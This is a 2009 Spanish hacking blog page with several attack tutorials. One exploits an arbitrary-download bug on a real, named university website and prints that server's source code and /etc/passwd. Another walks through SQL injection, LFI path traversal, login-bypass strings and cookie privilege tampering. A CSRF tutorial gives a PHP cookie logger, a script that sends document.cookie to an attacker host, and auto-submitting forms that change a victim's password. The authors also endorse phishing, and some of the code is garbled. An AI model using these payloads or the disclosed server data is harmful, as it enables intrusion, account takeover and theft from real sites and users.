Mostrando las últimas 29 entradas de un total de 30 de diciembre 2009 Mostrar las entradas más antiguas
Mostrando las últimas 29 entradas de un total de 30 de diciembre 2009 Mostrar las entradas más antiguas

jueves 31 de diciembre de 2009

Un Resumen del 2009

Comenzamos un Año de los mas dificiles para todos los ámbitos la crisis afectó a todos el mejor ejemplo es que la foca ya no será gratis...já este año lectores hemos pasado alti bajos juntos y me alegra ver saber como ha crecido poco a poco el blog, dando pasos lentos pero seguros, hemos perdido amigos que empezaron con nosotros, ahora hay uno nuevo pero no queremos irnos para el lado sentimental, les pongo el resumen de este año...

---------------------

Aprendimos a Spoofear User-Agent


Aprendimos sobre el Bluesnarfing


Aprendimos como funcionaba el Remote Code Execution



Aprendamos del Full Path Disclosure



Aprendimos a Configurar un archivo htaccess


Perverthso de CuscoSoft nos enseñó Sql Injection Básica

Jbyte de Jbyte-Security nos lo complementó con Injection a Sql Server


NitroNet Nos enseñó el Remote File Inclusion



Explicando el Path Trasversal



Comenté un poco del Reverse DNS



Ahora el Mass Defacemente



Robando Cookies con un Xss



El Hijacking



Expliqué el Cross Site Tracing


Aprendimos Login Bypass en el ISIL


Encontramos Xss en Tecsup



Nuestra Fanática



Vimos como se hacía Local Files Inclusion por Require()

LFI por uploader


Obtener Archivos del Servidor con Sql Injection



La Explicación de un Login Bypass



Remote Code Execution con Eval



Local File Disclosure



Argument Injection



Mi Exposición del LimaHack



Explique el Session Prediction



Session Fixation



Explique el XSRF



Insecure Permisions



Orientación del PHP al PenTest - CURL()



Insecure Cookie Handling



Nullbyte Poisoning



Sql Injection en ASP Ejempo Real



Descubrí un FPD en FaceBook



Expliqué el Cookie Poisoning



XSRF de Zer-Bits



Arbitrary Download + Full Source Disclosure de Zero-Bits



Espero Este Resumen les haya gustado ahora con mucho gusto y agradecimiento les digo...



Feliz Año Nuevo Que todo Sea bueno para Ustedes en todos los ámbitos, Espero no olviden seguridadblanca en el año que viene y esperamos el próximo año sea mejor para todos....

Happy Hacking =)




Saludos
Dr.White

miércoles 30 de diciembre de 2009

Arbitary Download+Full Source Disclosure

Full Source Disclosure.



0x01. Introducción



En DDLR ya algunos habrán leído mi tutorial sobre “Full Path Disclosure”, bueno, ahora les vengo hablar un poco de otra vulnerabilidad llamada “Full Source Disclosure” que ha estado un poco polémico en #DDLR, gracias al video de 0o_Zeus_o0 muy bueno la verdad y el post de Gothic-x también excelente.

Esta vulnerabilidad ya la había leído un poco antes, pero bueno, les hare un tuto, viendo que muchos les intereso este tema.



0x02. ¿Qué es Arbitrary Downloader y Full Source Disclosure o FSD?




Arbitrary Downloader para descargar cualquier archivo del servidor junto con Full Source Disclosure que ve el CODIGO COMPLETO es una vulnerabilidad MUY vista por así decirlo todavía en la RED, y se encarga de descargar cualquier fichero del servidor sin estar logeado o tener permiso alguno, y con esto podemos ver el CODIGO FUENTE (SOURCE) de este para sacar mucha información, pero no es lo mismo darle al index.php “VER CODIGO FUENTE” en tu navegador, que con verla en esta vulnerabilidad, ya que este muestra el código ORIGINAL del servidor.



Esta vulnerabilidad se debe a la mala programación de las variables especiales para descargar un archivo interno, permitiéndonos descargar cualquier archivo del servidor sin estar logeado o tener permisos como dije arriba.



Gracias al DORK creado por Gothic-x podrán encontrar muchos websites vulnerables y también encontré uno para explicar en este tutorial.





0x03. Practica




La web que usaremos de ejemplo seria esta: “http://www.favaloro.edu.ar”, el site de un medico argentino (Gracias KikoArg).




Primero me paso a descargar el “index” para que vean la diferencia entre “SOURCE DISCLOSURE” y “VER CODIGO FUENTE DESDE EL NAVEGADOR”:



FULL SOURCE DISCLOSURE:

Pasamos hacer que el servidor nos descargue el index principal que sería:

http://www.favaloro.edu.ar/force-download.php?file=index.php



Lo descargamos y lo abrimos con nuestro editor:







VER CODIGO FUENTE:








No sale completo como pueden ver en la barra, pero igual pueden notar que es diferente muy diferente, por eso se le llama “FULL SOURCE”

Esta simple vulnerabilidad puede llegar a ser muy muy peligrosa, ya que podemos descargar “CUALQUIERRR” fichero del servidor, pero claro, poniendo el directorio hasta el fichero:



http://localhost/descargas.php?file=config.php

http://localhost/descargas.php?file=/admin/datos.php

Ya queda de tu conocimiento de un servidor o para sacar datos, podemos usarlo si es que el servidor es vulnerable otra vulnerabilidad llamada “FULL PATH DISCLOSURE”, entre otras cosas.

Como vimos en el código fuente del “index.php” desde FULL SOURCE DISCLOSURE, podemos ver otros directorios donde podemos acceder y sacar muchas cosas como:




inc/principal.php:



<? require_once('/cnx/cnx.html');
$principal = "SELECT * FROM novedades WHERE (PortadaNovedades = 2) OR (PortadaNovedades = 3)
ORDER BY OrdenNovedades ASC LIMIT 0,5";
$principal2 = mysql_query($principal,$link);
?>
<div id="content">
<div id="novedades">
<div id="carrera">
<div class="principal-foto">
<p class="quote-it"><img src="/images/favaloro3.jpg" align="left" />
&quot;A los j&oacute;venes les pido que entiendan que lo material es temporario, lo que perdurar&aacute;
para siempre ser&aacute;n los ideales y entre ellos la gran convocatoria deber&iacute;a ser:
educaci&oacute;n y desarrollo cient&iacute;fico en busca de una sociedad en la que la equidad social sea lo prioritario&quot;.</p>

<p class="allign-right"> Dr. Ren&eacute; G. Favaloro, Tel Aviv, Israel, 1995<br />
Fotografia: Miguel Angel Generoso</p>
</div>
<div class="nov-box"> <h1></h1>

<script src="/Scripts/AC_RunActiveContent.js" type="text/javascript"></script>
<script type="text/javascript">
AC_FL_RunContent( 'codebase','http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=9,0,28,0','width','645','height','140','src','images/banner_general_645x140-1009','quality','high','pluginspage','http://www.adobe.com/shockwave/download/download.cgi?P1_Prod_Version=ShockwaveFlash','movie','images/banner_general_645x140-1009' ); //end AC code
</script><noscript><object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=9,0,28,0" width="645" height="140">
<param name="movie" value="/images/banner_general_645x140_1009.swf">
<param name="quality" value="high">
<embed src="/images/banner_general_645x140_1009.swf" quality="high" pluginspage="http://www.adobe.com/shockwave/download/download.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="645" height="140"></embed>

</object>
</noscript></div>
<?
while($principal3 = mysql_fetch_array($principal2)) {
echo "<div class=\"nov-box\">";
echo "<h1>".$principal3['TitulosNovedades']."</h1>";
echo "<p>".$principal3['CopeteNovedades']."</p>";
echo "<div class=\"nov-foot\"><a href=\"";
if ($principal3['LinkNovedades']=="") {
echo "?inc=novedades&IDNovedades=".$principal3['IDNovedades'];
} else {
echo $principal3['LinkNovedades'];
}
echo "\">mas informaci&oacute;n</a></div>";echo "</div>";
}?>

</div></div></div>




Algunos se preguntaran si sirven otros archivos como “/etc/passwd”, pues si, ejemplo:



http://www.favaloro.edu.ar/force-download.php?file=/etc/passwd



root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
postgres:x:31:32:postgres:/var/lib/postgres:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
operator:x:37:37:Operator:/var:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
admin:x:1000:1000:,,,:/home/admin:/bin/bash
identd:x:100:65534::/var/run/identd:/bin/false
sshd:x:101:65534::/var/run/sshd:/usr/sbin/nologin
telnetd:x:102:102::/nonexistent:/bin/false
mysql:x:1002:100::/home/mysql:/bin/bash
ftp:x:103:65534::/home/ftp:/bin/false
alias:x:1003:1002::/var/qmail/alias:/sbin/nologin
qmaild:x:1004:1002::/var/qmail:/sbin/nologin
qmaill:x:1005:1002::/var/qmail:/sbin/nologin
qmailp:x:1006:1002::/var/qmail:/sbin/nologin
qmailq:x:1007:1003::/var/qmail:/sbin/nologin
qmailr:x:1008:1003::/var/qmail:/sbin/nologin
qmails:x:1009:1003::/var/qmail:/sbin/nologin
vpopmail:x:1010:1004::/home/vpopmail:/sbin/nologin
bind:x:104:101::/var/cache/bind:/bin/false
favaloro:x:1014:100::/usr/local/apache2/htdocs/www.favaloro.edu.ar:/bin/bash
fundacion:x:1015:100::/usr/local/apache2/htdocs/www.fundacionfavaloro.org:/bin/bash
posgrado:x:1016:100::/usr/local/apache2/htdocs/www.favaloro.edu.ar/posgrado:/bin/bash
webmaster:x:1017:100::/usr/local/apache2/htdocs/:/bin/bash
gmj:x:1001:100::/home/gmj:/bin/bash
gaston:x:1018:0:GASTON:/home/gaston:/bin/bash
itfurf:x:1019:1006::/usr/local/apache2/htdocs/it.furf.com.ar/:/bin/bash
furf:x:1020:1007::/usr/local/apache2/htdocs/www.furf.com.ar:/bin/bash
hobbit:x:1021:1008::/usr/local/hobbit/:
backupfurf:x:1012:1012:,,,:/backup:/bin/bash
pricai:x:1013:1013:,,,:/usr/local/apache2/htdocs/pricai.com.ar:/bin/bash
ns1:x:1024:100::/home/ns1:
cei:x:1026:1026:,,,:/usr/local/apache2/htdocs/www.favaloro.edu.ar/COMUNICA:/bin/bash
congreso:x:1027:1027:,,,:/usr/local/apache2/htdocs/congresos.fundacionfavaloro.org:/bin/bash
cye:x:1025:1025:,,,:/usr/local/apache2/htdocs/www.fundacionfavaloro.org/cye:/bin/bash
proftpd:x:105:65534::/var/run/proftpd:/bin/false
favaloroftp:x:1029:1029:,,,:/usr/local/apache2/htdocs/www.favaloro.edu.ar/ftp:/bin/bash
ffavaloroftp:x:1030:1030:,,,:/usr/local/apache2/htdocs/www.fundacionfavaloro.org/ftp:/bin/bash
favaloro2:x:1031:50::/usr/local/apache2/htdocs/www2.favaloro.edu.ar:/bin/bash
ossec:x:1034:1034::/var/ossec:/bin/false
trimestral:x:1035:1035:,,,:/backup/trimestral:/bin/bash
campanas:x:1036:100::/usr/local/apache2/htdocs/www.favaloro.edu.ar/campanas:/bin/bash
dev:x:1022:1022:,,,:/usr/local/apache2/htdocs/dev.favaloro.edu.ar:/bin/bash
cuidatucorazon:x:1011:1011:,,,:/usr/local/apache2/htdocs/www.fundacionfavaloro.org/cuidatucorazon:/bin/bash
elvestuario:x:1023:1023:,,,:/usr/local/apache2/htdocs/www.favaloro.edu.ar/elvestuario:/bin/bash




Y muchas cosas más…




0x04. ¿Dónde está el Bug?



Bueno, no sigo mas, ya que no hay mucho que hablar, pero es bueno para los programadores y pentesters donde está el bug, pasaremos a descargar un archivo interesante: http://www.favaloro.edu.ar/force-download.php?file=force-download.php



<?php

$filename = $_GET['file'];

// required for IE, otherwise Content-disposition is ignored
if(ini_get('zlib.output_compression'))
ini_set('zlib.output_compression', 'Off');

// addition by Jorg Weske
$file_extension = strtolower(substr(strrchr($filename,"."),1));

if( $filename == "" )
{
echo "<html><title>eLouai's Download Script</title><body>ERROR: download file NOT SPECIFIED. USE force-download.php?file=filepath</body></html>";
exit;
} elseif ( ! file_exists( $filename ) )
{
echo "<html><title>eLouai's Download Script</title><body>ERROR: File not found. USE force-download.php?file=filepath</body></html>";
exit;
};
switch( $file_extension )
{
case "pdf": $ctype="application/pdf"; break;
case "exe": $ctype="application/octet-stream"; break;
case "zip": $ctype="application/zip"; break;
case "doc": $ctype="application/msword"; break;
case "xls": $ctype="application/vnd.ms-excel"; break;
case "ppt": $ctype="application/vnd.ms-powerpoint"; break;
case "gif": $ctype="image/gif"; break;
case "png": $ctype="image/png"; break;
case "jpeg":
case "jpg": $ctype="image/jpg"; break;
default: $ctype="application/force-download";
}
header("Pragma: public"); // required
header("Expires: 0");
header("Cache-Control: must-revalidate, post-check=0, pre-check=0");
header("Cache-Control: private",false); // required for certain browsers
header("Content-Type: $ctype");
// change, added quotes to allow spaces in filenames, by Rajkumar Singh
header("Content-Disposition: attachment; filename=\"".basename($filename)."\";" );
header("Content-Transfer-Encoding: binary");
header("Content-Length: ".filesize($filename));
readfile("$filename");
exit();

?>





Pueden notar que el archivo, no tiene validación protección “$filename = $_GET['file'];” y permite la descarga de cualquier archivo que se le ponga.





0x05. Conclusión




Bueno termine mi tuto, de esta vulnerabilidad no hay mucho que hablar, pero es bueno un tutorial, para los que no tienen idea de esto y puedan ver la FUERZA de esta vulnerabilidad tan peligrosa y buena, ya que es muy fácil y no es necesario hacer algo especial como otros métodos.



Si quieren saber mas de este método, pueden buscar en google y también los links que voy a dejar abajo.



0x06. Links interesantes


Video de 0o_ZeuS_o0 sobre esta vulnerabilidad (En el tutorial dice “FULL PATH DISCLOSURE”, pero es “FULL SOURCE” un error de escritura jeje).

http://www.youtube.com/watch?v=3c-pojLunmY&feature=player_embedded



Explotando Full Source Diclosure Bugueando "/force_download.html" de Gothic-x.

http://gothicx.diosdelared.com/?coment=3762



Màs de Full Source Diclosure de Gothic-x.

http://gothicx.diosdelared.com/?coment=3759



Ilegalintrusion - #DDLR - #RE - GH - Seguridadblanca




Autor: Zero Bits

Fecha: 15/11/09

Como precaución

debido a que ataques que se han hecho en contra de seguridadblanca para evitar pérdidas he hecho un backup de seguridadblanca oficial para que en el caso de que en algún momento seguridadblanca cayera puedan acceder a todo el contenido...


Click aquí para ir al backup


mas vale previnir que lamentar...


Saludos
Dr.White

martes 29 de diciembre de 2009

mis Owneds ¬¬

Bueno resulta que hubo un problemita con Jbyte pero ya está todo arreglado... disculpen los problemas ocacionados...


Saludos
Dr.White

sábado 26 de diciembre de 2009

Explotando Bugs en webs Básico

Muchos creen que para entrar a una web necesitasmos LAS TOOLS mas INCREIBLES del mundo pero realmente no necesitamos mucho, ahora les voy a describir una pequeña previa de como es el Dr.White en particular antes de atacar intentar ganar acceso a una web (WEB no ganar acceso a host ni vps ganar acceso a la web o explotar un bug...)


Lo primero...

Lo primero que hago es dejar la PC a un lado y voy a cojer un vaso con agua bien helada para que fluyan las ideas con claridad...


lo Segundo...

Esta etapa es la previa a comenzar el ataque... vamos a abrir un bloc de ntoas que nos ordenará lo que busquemos... primero vamos a buscar todos los links que hayan en el index y buscaremos todos los links posibles... ahora todos los links que no contengan variables los pondremos dentro del bloc de notas... de esta forma:


Links sin Variables:

http://www.practicingtuintrusion.com/img/gallery/images.php

http://www.practicingtuintrusion.com/admin/admin.php

http://www.practicingtuintrusion.com/sitemap.php

http://www.practicingtuintrusion.com/textos/



Ahora haremos lo mismo con las que si tengan variables...

nuestro bloc de notas deberia quedar algo asi:


links sin variables:

http://www.practicingtuintrusion.com/img/gallery/images.php

http://www.practicingtuintrusion.com/admin/index.php

http://www.practicingtuintrusion.com/search.php

http://www.practicingtuintrusion.com/textos/

Links con variables

http://www.practicingtuintrusion.com/img/gallery/images.php?id=10

http://www.practicingtuintrusion.com/textos/index.php?topic=seguridad

http://www.practicingtuintrusion.com/downloads/index.php?archivo=packlenguaje.zip


Ahora si ya tenemos todo un poco ordenado en primera lo que haremos será buscar formularios entre ellos cajas de texto... en lugares que no sea la administración... /admin/...

en nuestra busqueda hemos encontrado un textbox con un boton en:


http://www.practicingtuintrusion.com/search.php


cuando en el textbox ponemos seguridad nos pone algo como esto:


http://www.practicingtuintrusion.com/search.php?text=seguridad&privi;=user


podemos analizar que hay dos variables... entonces lo pasamos a la lista de las webs con variables como última en la lista ahora si a analizar las variables...


http://www.practicingtuintrusion.com/img/gallery/images.php?id=10


vamos a ver si es vulnerable a algún ataque... provamos poniendo script alert hola pero no paso nada entonces decimos a sisi una sql injection ya que al parecer algo no deja explotar el xss entonces vamos y ponemos una comilla simple despues del 10

y bien nos voto un error de sql, ahora ustedes pueden revisar la etiqueta pentest u otras segun lo que busquen para encontrar un tutorial de como explotar...

ahora el siguiente link...

http://www.practicingtuintrusion.com/textos/index.php?topic=seguridad


lo primero que haremos será probar si es vulnerable a xss con un simple alert y probamos... y si si es vulneable... nosotros pusimos alert('hola') y nos mostro un msgbox con el contenido hola... ahora ya pueden buscar la etiqueta Xss y ver todo lo que pueden explotar...

ahora vamos a ver el tercer link:

http://www.practicingtuintrusion.com/downloads/index.php?archivo=packlenguaje.zip

ese uno de los mas peligrosillos... vamos a ver si es vulnerable a File Disclosure...

hay que poner otro archivo a ver si lo descarga...

http://www.practicingtuintrusion.com/downloads/index.php?archivo=index.php

lo descargó... ahora si ya tenemos el index podemos ver a que cosa le hace requiere o requiere once para descargar archivos que nos sirvan para explotar mejor este bug...

ahora el último...

http://www.practicingtuintrusion.com/search.php?text=seguridad&privi;=user

veamos... vamos a dejar la variable privi de lado... busquemos a ver que podemos hacer con seguridad y despues de un rato de buscar hemos dado con que poniendo text=index.php nos muestra un index.php eso se parece a un LFI entonces pongamos ../etc/passwd% 00 a ver que pasa... no pasa nada mmm pongamos entonces doble ../ ahora si nos muestra todo el passwd ya tenemos como explotar un LFI... ahora la variable privi vemos que dice user mmm yo creo que solo nos muestran los resultados que son para los users comunnes pero como somos curiosos pondremos privi=admin a ver que pasa y los resultados pasaron de ser 50 a 100 por dios ya tenemos mas que estudiar...


ahora el panel de administracion:


vamos a ver que nos da para poner usuario y contraseña...

vamos a probar con una simple sql injection para bypassear login...

'or''='

y vemos que no nos da el acceso entonces decimos... esto fue todo? mm no podemos buscar por donde sacar algo... y vemos que cuando nos ponemos privi=admin la cookie cambia entonces con el live http headers nos pondremos como cookie la que nos daba cuando estabamos en privi=admin... y hemos entrado por un error de privilegios que también está explicado en el blog en la etiqueta pentest... ahora esto es una especie de taxonimía muy básica...


espero a provechen este tipo de enseñansa para que ustedes también usen algo de lo que les enseñé hoy...


Saludos
Dr.White

jueves 24 de diciembre de 2009

Feliz Navidad Te desea SeguridadBlanca

Feliz Navidad


Les Deseo Feliz navidad a todos los lectores de SeguridadBlanca y a Todo el mundo en general, espero la pasen muy bien en estas fechas, que la pasen con sus seres queridos y que no se les olvide de practicar todo lo que han aprendido y pues Feliz Navidad de nuevo...



De Camilo Galdos AkA Dr.White || Dédalo --> SeguridadBlanca

Para: El Mundo


Con esta entrada no quiere decir que voy a dejar de escribir en el año o en el día igual escribiré pero quiero desearles una muy feliz navida...



Saludos
Dr.White

miércoles 23 de diciembre de 2009

[Tutorial] Vulnerabilidad CSRF By ShadinessDark [Colaboracion de Zero Bits]

Este tutorial fue hecho por un AMIGO en cual colabore y aca se los dejo:


Inicio Tutorial Cross Site Request Forgery By ShadinessDark = Zero Bits




1.) Presentación



2.) Que es CSRF



3.) Quien descubrió la vulnerabilidad CSRF




4.) CSRF y Xss



5) Robo de Cookies en XSS & CSRF (Diferencia) - Colaboracion de Zero Bits



6.) Testeando vulnerabilidad CSRF y programas el code vulnerable



7.) Sacando una conclusión a todo



8.) Como cuidar nuestra Web de este tipo de ataques




9.) Despedida





1.) Presentación



Primero que nada este tutorial va dedicado a mis amigos de BugDox y a todo los Lectores especialmente a los que no les caigo bien, muchos me harán criticas Y eso es Bueno porque Uds. Me corrigen como muchos saben yo me retire del DEFACING no Es que yo sea conocido ni nada por el estilo este tutorial lo he hecho de manera especial

Para dar la diferencia de otros tutoriales que he visto en la red…



¿Por qué diferente?



Porque la mayoría de los tutoriales visto en la red son poco explicados para iniciados




¿A que se debe este tutorial?



Bueno este tutorial no puedo decir que lo hago con el fin de bien lo hago para bien y Para mal lo hago con concepto de cómo explotarlo y concepto de cómo arreglarlo

No es mi culpa que un Web Master no me haga caso ¿Verdad?



Los saludos más especiales para mis compañeros:



Zero Bits

KuTer

Jeferx


Darki113r

_84kur10_

Z1z30f

Kozmic.Kizz




2.) Que es CSRF



Bueno como muchos quizás han leído en la wikipedia ya csrf representa a

Cross Site Request Forgery el ataque se efectúa cuando por ejemplo Vemos algo

Así Presiona este link para que te lleve a mi sitio


Siempre el atacante usa como victima a un usuario que le brinda confianza la Web.

Los que tenemos foros sabemos que cada usuario tiene como destino un perfil donde

Cambiamos contraseña – email – nombre de usuario y otras cositas casi siempre el Atacante usa un código malicioso para hacer una petición en {GET – Post – HTTP}

Con esta vulnerabilidad el atacante le puede cambiar a la victima su información de PERFIL.



3.) Quien descubrió la vulnerabilidad CSRF



En el 1988 Hardy Norma publico un documento que explique una solicitud cuestión nivel de confianza que llamo un

Diputado confuso. En 2000, un correo a bugtraq explico Zope fue afectado por un problema confuso

Web diputado que se define hoy como una vulnerabilidad CSRF mas tarde en el 2001 Peter Watkins publico una entrada


En la lista de correo bugtraq acuñar el termino CSRF en respuesta a otro hilo titulado

Los peligros de permitir a los usuarios colocar imágenes en los sitios Web.



Bueno sobre quien lo descubrio ese credito si no me toca a mi esa parte es de Aqui solo lo logre traducir...



4.) CSRF y Xss



Quizás muchas personas nos preguntamos o se preguntan si esta vulnerabilidad

Es parecida o igual a xss.




Les explico bueno xss se aprovecha de la confianza de la victima que tiene el sitio

Web o aplicación el usuario lea ae contenido que aparece en su navegador que esta destinada y representada por el sitio Web que se esta viendo.



El csrf se aprovecha de la confianza que el sitio tiene para la victima ósea usuario…



4.1) Robo de Cookies en XSS & CSRF (Diferencia) - Colaboracion de Zero Bits



Bueno hay un metodo en XSS que algunos amigos me han dicho que se parece a el XSRF o CSRF, que son el ROBO DE COOKIES EN XSS y el CSRF, la verdad es que no ya que, el robo de cookies por xss como su nombre lo indica roba las cookies de cualquier usuario o administrador del sitio y el CSRF se encarga de ROBAR, VER y CAMBIAR cualquier informacion dependiendo de la victima que caiga.




Vamos a ver un ROBO DE COOKIES EN XSS y un ataque CSRF clasico, para que vean un poco la diferencia...



- ROBO DE COOKIES EN XSS



Primero tendriamos que saber si el server es vulnerable a XSS o tambien podriamos probar que el code

[code ][url ] o [img ] [/code ]

no filtre bien el contenido que se le asigne.



Para algunos que no entienden lo de [code ][url ] y [img ][/code ] es cuando dentro del [code ][url ][/code ] agregariamos un link como [code ]"javascript:alert("xss")"[/code ] y cuando se le de click se ejecute hay mismo, tambien podriamos agregar XSS con codes HEXADECIMALES (ya esto es otro tema, asi que no lo explicare).



Bueno, en otro servidor aparte (que seria el nuestro) codeariamos un programa en PHP que se encargue de recibir al usuario victima y robarle las cookies apenas entre (Para esto se necesita saber por lo menos PHP BASICO)




<?
$cookie = $_REQUEST[cookie];
$file=fopen("/cookies.txt", "a");
fput($file, "$cookie\n");
fclose($file);
?>




PD: Este code no es mio es de Chebyte. Pero esto es basico...



Bueno, le explicare el code para quienes no lo entiendan:



$cookie = $_REQUEST[cookie] : El que recibe la cookie

$file=fopen("/cookies.txt", "a") : Crea el archivo cookies.txt para lectura

fput($file, "$cookie\n") : Muestra la cookie


fclose($file) : Cierra



Podriamos guardarlo "/robador.html" y ahora faltaria el code que redireccione a este CODE:



<script>self.location='e);"target=" _blank">http://TuWeb.com/robador.php?c='+scape(document.cookie)</script>




Y Tachan! tienes la cookie...



Bueno antes que nada les dire lo SCRIPT KIDDIE y BUENO de este metodo:




1. SCRIPT KIDDIE: Usar este metodo contra webs de Hacking

2. NO-LAMMER: Usar contra sites malos como: Porno, Pedofilia, Estafadores, Enemigos, EMOS!!!, etc..

3. SCRIPT KIDDIE: Aprender este metodo unicamente sin saber como funciona

4. NO-LAMMER: Aprender JAVASCRIPT, HTML y PHP

5. MEDIO: Usarla para Phishing [Es malo y es bueno xD, pero no es lammer]

5. SCRIPT KIDDIE: Hacking MSN -.-"



Ahora pasaremos a hablar del CSRF clasico:




- XSRF/CSRF Clasico



Bueno ahora usaremos una forma de XSRF clasico, pero no de robo si no de CAMBIO de datos, que seria primero como dije probar si el server es vulnerable a JAVASCRIPT, o si no filtra bien el contenido de los BBCODES, o los inputs mal programados, o tambien podriamos atacar normal, sin que el usuario sepa que es un ataque.



Podriamos atacar sin que la victima sepa que es malo asi (dependiendo de la pagina):



<form action="formulario" action="http://victima.com/perfil.php" method="POST">
<input type="hidden" name="email" value="tuemail@hotmail.com">
<input type="hidden" name="passwirdl" value="minuevopassword">
<input type="hidden" name="submit" value="enviar">

<script>document.submit();</script>




Como dije depende de la web, SI EL SITE NO TIENE AL CAMBIAR DATOS, REPITE EL EMAIL o CONTRASEÑA es vulnerable y tambien de los input "name=NOMBRE" del site. La victima no sabe que le hemos cambiado el email...



Tambien si al cambiar datos salga un link como este:



[quote]http://www.web.com/perfil.php?user=NOMBREUSUARIONUEVO&mail=minuevomail@hotmail.com&pass=minuevopass[/quote]




Es super hiper mega vulnerable ya que notamos que no dice en el link a cambiar: PASSANTERIOR o EMAILANTERIOR... y que pasa si le mandamos un MP (Mensaje Privado) depende claro si es un foro con un link como este:



Man vota por mi



Y al hacer click en cualquiera de los ejemplos los datos han sido cambiados..



Espero que les haya gustado mi parte en este bonito tutorial creado por mi bro ShadinessDark y puedan entender la diferencia entre XSS (El robo de cookies) y CSRF...






5.)Testeando vulnerabilidad CSRF y programas el code vulnerable



Los ataques csrf lo reproducen por etiquetas HTML/JAVASCRIPT o una

Imagen, daré un breve ejemplo:



Un ejemplo nos envían un correo electrónico o un MP en algún foro cuyo propósito

Del atacante es que al darle clic realiza una solicitud a una URL del atacante les Mostrare un ejemplo:




Por ejemplo usando una imagen src.

<img src="http://Www.xD.com/?Comando">



Script

<script src="http://Www.xD.com/?Comando">



Casi siempre se usan los IFRAME



<iframe src="http://Www.xD.com/?Comando">




Los ejemplos de arribas son dados con HTML ahora les doy el ejemplo de los de Javascript



<script>

var foo = new Image(); var foo = new Image ();

foo.src = "http://Www.xD.com/?Comando";</script>



También se puede hacer por XHTML pero hay que usar IE y bueno esa no se las explicare en este tutorial y si quieren me avisan y bueno lo modifico, Claro que existen muchas formas Vbscript – Actionscript – HTML – Javascript - JScript y otros que utilizan de marcado en los navegadores de los usuarios que hacen

Realizar peticiones REMOTAS.




¿Cambiando datos de la victima?




Bueno este breve codigo es solo un pequeño ejemplo:



<script>

var post_data = 'name=value'; post_data var = 'nombre = valor';

var xmlhttp=new XMLHttpRequest(); var xmlhttp = new XMLHttpRequest ();

xmlhttp.open("POST", 'http://www.xD.com/path/file.ext', true); xmlhttp.open ( "POST", "http://www.xD.com/path/file.ext ', true);

xmlhttp.onreadystatechange = function () { xmlhttp.onreadystatechange = function () (


if (xmlhttp.readyState == 4) if (xmlhttp.readyState == 4)

{ (

alert(xmlhttp.responseText); alert (xmlhttp.responseText);

} )

}; );

xmlhttp.send(post_data); xmlhttp.send (post_data);

</script> </ script>




Como podemos ver en este código hacemos una petición a POST

Acuérdense que arriba les comente que cuando el atacante usa un código

Malicioso hace una petición en Get. Post y HTTP ¿Se acuerdan? Espero y me vayan entendiendo...



¿A dónde se dirige esta petición?



Bueno esta petición se dirige a la base de datos del sitio me explico

Cada vez que hacemos cambios extremos en nuestro perfil todo pasa

Por una base de datos bueno cuando la victima le da clic a la url enviada

Por el atacante hace una petición en la base de datos y cambia los datos de la cuenta


De la victima de confianza por el atacante ¿Me van entendiendo a que se debe este ataque?



7.) Sacando una conclusión a todo.



Mirando la lógica a todo este ataque se basa en un código malicioso que es muy usado, HTML Y Javascript.



Es un tipo de ataque que por parte de HTML usamos la etiqueta src y en javascript Usamos la misma etiqueta este ataque es basado en darle clic a un vinculo al Redireccionar la Web y cargar cambia la información que de nuestro usuario.

Haciendo una petición en la base de datos del código del atacante…



8.) Como cuidar nuestra Web de este tipo de ataques





Primero que nada vamos a nuestro FTP introducimos nuestros datos y entramos a la Carpeta public_html o donde este el archivo index.php le añadiremos algo que diga

‘Actualcontraseña’ Antes de seguir el código que pondré es sacado de la siguiente pagina De aquí



Después que estemos en el index.php introduciremos este código con el Actualcontraseña esto tiene que ir dentro de <?php…

<form method="POST" action="/datos.html" name="datos">
Usuario <input type="text" name="usuario">
Email <input type="text" name="email">

Contraseña <input type="text" name="contraseña">
Email alternativo: <input type="text" name="emailalternativo">
Contraseña Actual: <input type="text" name="actualcontraseña">
<input type="submit" name="submit" value="cambiardatos">
</form>





Luego buscamos el archive que se llama Config.php lo pueden encontrar

Por el mismo FTP y le agregamos lo siguiente:



<?php

$bd_host = "localhost";
$bd_usuario = "user";
$bd_password = "pass";
$bd_base = "bd";

$con = mysql_connect($bd_host, $bd_usuario, $bd_password); mysql_select_db($bd_base, $con);

?>




En el archive datos.php usaremos lo siguiente:



<?

include('/config.html');

session_start();
if(isset($_REQUEST['usuario']))
$usuario = $_REQUEST['usuario'];
else
die("Rellene el campo Usuario");
if(isset($_REQUEST['email']))
$email = $_REQUEST['email];
else
die("Rellene el campo email");
if(isset($_REQUEST['contraseña']))
$contraseña = $_REQUEST['contraseña];
else
die("Rellene el campo Contraseña");
if(isset($_REQUEST['emailalternativo']))
$emailalternativo = $_REQUEST['emailalternativo];
else
die("Falta el email alternativo");
if(isset($_REQUEST['actualcontraseña']))
$actualcontraseña = $_REQUEST['actualcontraseña];
else
die("Especifique la contraseña");

if ($actualcontraseña==NULL) {
echo "Especifique su contraseña Actual";

}else{

$query = mysql_query("SELECT usuario,actualcontraseña FROM myhosting_usuarios WHERE username = '$usuario'") or die(mysql_error());
$data = mysql_fetch_array($query);
if($data['contraseñaa'] != $actualcontraseña) {
echo "Contraseña Actual Inavalida";
}else{

CambiarDatos($usuario, $email, $contraseña, $emailalternativo);

?>




Ahora vamos a nuestro panel entramos a PHPMYADMIN ósea a nuestro phpmyadmin


Y le damos donde dice Consulta y introducen el siguiente código:

CREATE TABLE 'myhosting_usuarios' (
